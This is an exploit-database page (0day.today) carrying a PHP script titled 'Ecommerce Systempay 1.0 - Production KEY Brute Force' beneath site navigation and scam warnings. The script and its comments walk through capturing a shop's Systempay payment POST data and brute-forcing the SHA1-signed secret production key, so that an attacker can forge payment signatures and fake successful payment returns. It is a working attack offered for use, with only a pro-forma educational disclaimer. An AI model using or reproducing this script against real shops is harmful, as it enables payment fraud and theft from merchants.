0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Ecommerce Systempay 1.0 - Production KEY Brute Force Exploit
[# Exploit Title: Ecommerce Systempay 1.0 - Production KEY Brute Force
# Author: live3
# Vendor Homepage: https://paiement.systempay.fr/doc/fr-FR/
# Software Link: https://paiement.systempay.fr/doc/fr-FR/module-de-paiement-gratuit/
# Tested on: MacOs
# Version: ALL
<?php
/**
*
* INFORMATION
* Exploit Title: Ecommerce Systempay decode secret production KEY / Brute Force
* Author: live3
* Date: 2020-02-05
* Vendor Homepage: https://paiement.systempay.fr/doc/fr-FR/
* Tested on: MacOs
* Version: ALL
* Prerequisite: Find a ecommerce who is using Systempay AND SHA1 to crypt signature.
* Put some product on cart and choose systempay for payment method.
* get all data from post sent to https://paiement.systempay.fr/vads-payment/
* keep signature as reference and all vads fields to create new signature.
* Use script to make a brute force on Secret product key (16 char length)
*
* Usage: Once you have the production KEY all modifications on form data will be accepted by systempay ! (You will just generate new signature with your changes)
* You will be able to generate a success payment return !
*
* FOR EDUCATIONAL PURPOSES ONLY. DO NOT USE THIS SCRIPT FOR ILLEGAL ACTIVITIES.
* THE AUTHOR IS NOT RESPONSIBLE FOR ANY MISUSE OR DAMAGE.
*
*/
// Set the start number you want (16 char length)
$last_key_check = '1000000000000000';
// Assign var
$array_key = array();
$sentence = '';
$how_many_key_to_check_for_loop = 10;
// Put here signature extract from POST DATA
// Example of SHA1 from string : test
$signature_from_post = 'a94a8fe5ccb19ba61c4c0873d391e987982fbbd3';
// Copy paste your content decoded of POST DATA
$form_data = '
vads_field_1: VALUE1
vads_field_2: VALUE2
// AND ALL OTHER FIELDS...
';
$array = explode(PHP_EOL, $form_data);
foreach ($array as $data) {
if ($data != '') {
$elements = explode(': ', $data);
if (!empty($elements)) {
$array_key[trim($elements[0])] = $elements[1];
}
}
}
ksort($array_key);
foreach ($array_key as $value) {
$sentence .= $value . '+';
}
echo 'Signature from POST DATA : '.$signature_from_post.'<br/>';
$found = false;
$get_key = '';
// first check
if (sha1($sentence.$last_key_check) != $signature_from_post) {
for ($i = $last_key_check; $i <= $last_key_check+$how_many_key_to_check_for_loop; $i++) {
$get_key = $i;
if (sha1($sentence.$i) == $signature_from_post) {
echo 'Key found : '.$i.'<br/>';
$found = true;
break;
}
}
} else {
$found = true;
}
if ($found) {
$test_sha = sha1($sentence.$get_key);
echo 'Signature calc : '.$test_sha.'<br/><hr/>';
} else {
echo 'Last key check : '.$get_key.'<br/><hr/>';
}
echo 'Your sequence : '.$sentence.'<br/>';
# 0day.today [2024-11-15] #